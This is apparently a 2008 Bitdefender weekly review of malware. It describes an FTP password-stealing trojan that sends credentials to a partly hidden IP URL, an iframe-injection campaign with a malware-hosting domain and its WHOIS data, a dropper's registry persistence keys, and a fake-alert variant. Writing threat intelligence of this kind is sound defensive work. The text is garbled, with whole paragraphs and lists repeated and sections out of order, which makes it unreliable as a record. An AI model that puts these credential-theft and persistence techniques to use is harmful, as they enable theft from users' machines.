Sep
08
Filed Under:
WEEKLY REVIEW
Interesting Trojans
08 September 2008
We have a couple of interesting Trojans this week, one that drops a dll file and runs it, another that steals FTP passwords from well known applications.
This little nagger is usually dropped in the Internet Explorer directory under the name setupapi.dll by Trojan.Dropper.SHL. The Trojan steals passwords used to access the FTP servers. It has different decryption routines of a set number of common FTP applications. After the decryption is successful, Tupai encrypts it using its own routines and sends it to a database using an url like: http://85.225.[hidden].198/ftpg/ftp.php
Following programs are targeted by Trojan.PWS.Tupai.A:
SecureFx
IpSwitch
FTPWare
Rhine Software
FileZilla
Total Commander
BulletProof Ftp
GlobalScape Ftp
CoffeCup Fp
Ftp Commander Pro
Smart Ftp
Leap Ftp
Far
This is yet another Iframe hack for infecting users without any notice. Legitimate Web sites contain this iframe at the end of the code. The most probable way the code gets injected into them is by use of sql injection exploits. This iframe redirects the users to another infected Web site which has been available for quiet some time now, and is still infecting users. Here are some details about the domain:
Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: NizovGrisha
Registrant Name: NizovGrisha
Administrative Email: [blocked]
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14
The site features adult rated material, which of course is only a facade to its true nature. It is hosting a whole bunch of e-threats, like the rogue antivirus software “XP Antivirus”, Trojan.Spammer.Tedroo, Trojan.Exchanger, Trojan.Spy.Zeus and many others. It is supplying these malware to the victim machine by using a CGI script that gets them from an address like: [infected_site]/in.cgi?[number_for_e-threat].
We also got a new iframe exploit that gives us hints of organized cybercriminals. All in all, just some “regular” 7 days at the BitDefender Research Lab.
Uppon execution, this e-threat copies itself to C:\Documents and Settings\Local Settings\Temp\__a00[some-hexa-digits].exe and adds the following registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\A00[some-hexa-digits].exe C:\Documents and Settings\Local Settings\Temp\__a00[some-hexa-digits].exe. Afterwards, the Trojan drops a .DLL file in the directory it was run from, with a *.DAT extension. It loads this .DLL and executes its exported function called A.
When running the code, it copies the .DLL in the system directory (C:\windows\system32) under a name which looks like __c00[five-hexa-digits].dat and sets the following registry key:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\__c00[five-hexa-digits]
* Logon -> B
* Impersonate -> 0x00000000
* DllName -> C:\WINDOWS\system32\__c00[five-hexa-digits].dat
* Startup -> B
* Asynchronous -> 0x00000001
It also creates a mutex named vmc_mm and downloads a file from an external link.
When running the code, it copies the .DLL in the system directory (C:\windows\system32) under a name which looks like __c00[five-hexa-digits].dat and sets the following registry key:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\__c00[five-hexa-digits]
* Logon -> B
* Impersonate -> 0x00000000
* DllName -> C:\WINDOWS\system32\__c00[five-hexa-digits].dat
* Startup -> B
* Asynchronous -> 0x00000001
It also creates a mutex named vmc_mm and downloads a file from an external link.
This little nagger is usually dropped in the Internet Explorer directory under the name setupapi.dll by Trojan.Dropper.SHL. The Trojan steals passwords used to access the FTP servers. It has different decryption routines of a set number of common FTP applications. After the decryption is successful, Tupai encrypts it using its own routines and sends it to a database using an url like: http://85.225.[hidden].198/ftpg/ftp.php
Following programs are targeted by Trojan.PWS.Tupai.A:
SecureFx
IpSwitch
FTPWare
Rhine Software
FileZilla
Total Commander
BulletProof Ftp
GlobalScape Ftp
CoffeCup Fp
Ftp Commander Pro
Smart Ftp
Leap Ftp
Far
This is yet another Iframe hack for infecting users without any notice. Legitimate Web sites contain this iframe at the end of the code. The most probable way the code gets injected into them is by use of sql injection exploits. This iframe redirects the users to another infected Web site which has been available for quiet some time now, and is still infecting users. Here are some details about the domain:
Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: NizovGrisha
Registrant Name: NizovGrisha
Administrative Email: [blocked]
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14
The site features adult rated material, which of course is only a facade to its true nature. It is hosting a whole bunch of e-threats, like the rogue antivirus software “XP Antivirus”, Trojan.Spammer.Tedroo, Trojan.Exchanger, Trojan.Spy.Zeus and many others. It is supplying these malware to the victim machine by using a CGI script that gets them from an address like: [infected_site]/in.cgi?[number_for_e-threat].
Another variant of Fakealert has appeared as well, called: Trojan.FakeAlert.ACR . It has the same functionalities as its previous siblings namely:
- changes desktop wallpaper
- replaces screensaver with the bluescreen joke screensaver from Sysinternals
- warns the user about fake malware infections
- downloads rogue antivirus software
- changes desktop wallpaper
- replaces screensaver with the bluescreen joke screensaver from Sysinternals
- warns the user about fake malware infections
- downloads rogue antivirus software
Copyright 2011. Site powered by Bitdefender